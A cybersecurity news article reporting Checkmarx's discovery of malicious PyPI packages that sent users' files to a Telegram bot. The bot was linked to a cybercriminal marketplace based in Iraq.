Breaking cybersecurity news, news analysis, commentary, and other content from around the world, with an initial focus on the Middle East & Africa and the Asia Pacific

Well-Established Cybercriminal Ecosystem Blooming in Iraq

A malicious Telegram bot is the key to a veritable flourishing garden of nefarious cybercriminal activity, which was discovered via a series of Python packages.

Leonardslee garden in full bloom, Sussex UK
Source: Picturebank via Alamy Stock Photo

A sprawling criminal network has emerged in Iraq, linked to a Telegram bot that dates back to 2022 and contains more than 90,000 messages, mostly in Arabic.

According to researchers at Checkmarx, the bot is the key to a larger, sophisticated cybercriminal ecosystem, including a thriving underground marketplace offering social media manipulation services and financial theft tools, and a suite of malicious PyPI packages that exfiltrate user data.

Malicious PyPI Packages for Data Theft

A series of malicious, Arabic-language Python packages recently surfaced on the Python code repository PyPI according to Checkmarx, uploaded by a user named "dsfsdfds." Upon further examination, the researchers found them to contain a malicious script that was pilfering sensitive user data out to a Telegram bot chat.

"The malicious script … begins by scanning the user's file system, focusing on two specific locations: the root folder and the DCIM folder," according to the report, released today. "During this scanning process, the script searches for files with extensions such as .py, .php, and .zip files, as well as photos with .png, .jpg, and .jpeg extensions."

The packages also contained a hardcoded Telegram ID and token, which Checkmarx researchers used to gain direct access to the attacker's Telegram bot, where they discovered "a significant history of activity, with records dating back to at least 2022, long before the malicious packages were released on PyPI."

Ultimately, the 90,000 messages pointed to an origin in Iraq, with ties with many other bots to boot. In all, it's clear that Iraq is home to a heretofore unknown, thriving cybercriminal enterprise with a raft of illicit services on offer.

"The discovery of the malicious Python packages on PyPI and the subsequent investigation into the Telegram bot have shed light on a sophisticated and widespread cybercriminal operation," the report concluded. "What initially appeared to be an isolated incident of malicious packages turned out to be just the tip of the iceberg, revealing a well-established criminal ecosystem based in Iraq."

The discovery underscores the role that open source software continues to play when it comes to providing an attack vector for compromising enterprise information, the researchers noted, adding that they plan to release further details on the Iraq underground discovery in the coming months.

"As the fight against malicious actors in the open-source ecosystem persists, collaboration and information sharing among the security community will be critical in identifying and thwarting these attacks," they said. "Through collective effort and proactive measures, we can work towards a safer and more secure open-source ecosystem for all."

About the Author

Tara Seals, Managing Editor, News, Dark Reading

Tara Seals has 20+ years of experience as a journalist, analyst and editor in the cybersecurity, communications and technology space. Prior to Dark Reading, Tara was Editor in Chief at Threatpost, and prior to that, the North American news lead for Infosecurity Magazine. She also spent 13 years working for Informa (formerly Virgo Publishing), as executive editor and editor-in-chief at publications focused on both the service provider and the enterprise arenas. A Texas native, she holds a B.A. from Columbia University, lives in Western Massachusetts with her family and is on a never-ending quest for good Mexican food in the Northeast.

Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

You May Also Like


More Insights